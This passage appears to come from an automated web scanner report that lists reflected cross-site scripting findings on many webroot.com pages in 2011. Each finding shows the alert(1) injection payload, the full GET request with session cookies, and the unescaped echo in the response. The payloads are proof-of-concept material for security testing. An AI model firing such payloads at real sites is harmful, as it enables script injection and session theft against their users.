Content-Length: 48857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<he
...[SNIP]...
<script type="text/javascript">
   //bold which ever page this is
   $("#rightRailLinks ul li a[href='/En_US/business-antispyware-ce-with-antivirus.html?a611a"-alert(1)-"edea93188f=1']").css("font-weight", "bold");
</script>
...[SNIP]...
4.202. http://www.webroot.com/En_US/business-antispyware-ce.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/business-antispyware-ce.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbd72"-alert(1)-"8a0c6be8998 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/business-antispyware-ce.html?cbd72"-alert(1)-"8a0c6be8998=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 46800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<he
...[SNIP]...
<script type="text/javascript">
   //bold which ever page this is
   $("#rightRailLinks ul li a[href='/En_US/business-antispyware-ce.html?cbd72"-alert(1)-"8a0c6be8998=1']").css("font-weight", "bold");
</script>
...[SNIP]...
4.203. http://www.webroot.com/En_US/business-events-and-webinars-archives.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/business-events-and-webinars-archives.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19b23"-alert(1)-"08b2f515f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/business-events-and-webinars-archives.html?19b23"-alert(1)-"08b2f515f3=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 28779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<he
...[SNIP]...
type="text/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/business-events-and-webinars-archives.html?19b23"-alert(1)-"08b2f515f3=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...
4.204. http://www.webroot.com/En_US/business-products.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/business-products.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e87a2"-alert(1)-"225e28addd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/business-products.html?e87a2"-alert(1)-"225e28addd9=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 29700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<he
...[SNIP]...
<script type="text/javascript">
   //bold which ever page this is
   $("#rightRailLinks ul li a[href='/En_US/business-products.html?e87a2"-alert(1)-"225e28addd9=1']").css("font-weight", "bold");
</script>
...[SNIP]...
4.205. http://www.webroot.com/En_US/business-security-resources-customer-case-studies.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/business-security-resources-customer-case-studies.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e445"-alert(1)-"2963631dfae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/business-security-resources-customer-case-studies.html?2e445"-alert(1)-"2963631dfae=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 73281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<he
...[SNIP]...
javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/business-security-resources-customer-case-studies.html?2e445"-alert(1)-"2963631dfae=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...
4.206. http://www.webroot.com/En_US/business-security-resources-white-papers-and-reports.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/business-security-resources-white-papers-and-reports.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15427"-alert(1)-"54c3f4aa5d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/business-security-resources-white-papers-and-reports.html?15427"-alert(1)-"54c3f4aa5d3=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<he
...[SNIP]...
ascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/business-security-resources-white-papers-and-reports.html?15427"-alert(1)-"54c3f4aa5d3=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...
4.207. http://www.webroot.com/En_US/case-study/email-security-chula-vista.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/email-security-chula-vista.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cd53"><script>alert(1)</script>c11a0418132 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/email-security-chula-vista.html?8cd53"><script>alert(1)</script>c11a0418132=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21232


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
<link rel="canonical" href="http:///En_US/case-study/email-security-chula-vista.html?8cd53"><script>alert(1)</script>c11a0418132=1" />
...[SNIP]...
4.208. http://www.webroot.com/En_US/case-study/email-security-chula-vista.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/email-security-chula-vista.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a80b"-alert(1)-"ca44564b1f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/email-security-chula-vista.html?7a80b"-alert(1)-"ca44564b1f9=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21202


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
type="text/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/case-study/email-security-chula-vista.html?7a80b"-alert(1)-"ca44564b1f9=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...
4.209. http://www.webroot.com/En_US/case-study/internet-security-for-students.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/internet-security-for-students.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83e69"><script>alert(1)</script>d61538cc7e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/internet-security-for-students.html?83e69"><script>alert(1)</script>d61538cc7e6=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22489


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
<link rel="canonical" href="http:///En_US/case-study/internet-security-for-students.html?83e69"><script>alert(1)</script>d61538cc7e6=1" />
...[SNIP]...
4.210. http://www.webroot.com/En_US/case-study/internet-security-for-students.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/internet-security-for-students.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f856"-alert(1)-"f99e19d405c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/internet-security-for-students.html?1f856"-alert(1)-"f99e19d405c=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22459


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
e="text/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/case-study/internet-security-for-students.html?1f856"-alert(1)-"f99e19d405c=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...
4.211. http://www.webroot.com/En_US/case-study/internet-security-in-australia.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/internet-security-in-australia.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b420"-alert(1)-"5b7e7f6458a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/internet-security-in-australia.html?2b420"-alert(1)-"5b7e7f6458a=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21713


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
e="text/javascript">
$(function() {    
/* jquery should be wrapped in document ready function */                        
               
$("#resourcesLinks ul li a[href='/En_US/case-study/internet-security-in-australia.html?2b420"-alert(1)-"5b7e7f6458a=1']").css("font-weight", "bold");
});
</script>
...[SNIP]...
4.212. http://www.webroot.com/En_US/case-study/internet-security-in-australia.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/internet-security-in-australia.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40c43"><script>alert(1)</script>e7b38b78623 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/internet-security-in-australia.html?40c43"><script>alert(1)</script>e7b38b78623=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21742


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
<link rel="canonical" href="http:///En_US/case-study/internet-security-in-australia.html?40c43"><script>alert(1)</script>e7b38b78623=1" />
...[SNIP]...
4.213. http://www.webroot.com/En_US/case-study/saas-technology-cloud-computing.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/case-study/saas-technology-cloud-computing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c3b3"><script>alert(1)</script>4078136ea2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/case-study/saas-technology-cloud-computing.html?8c3b3"><script>alert(1)</script>4078136ea2c=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:12:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22170


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


<
...[SNIP]...
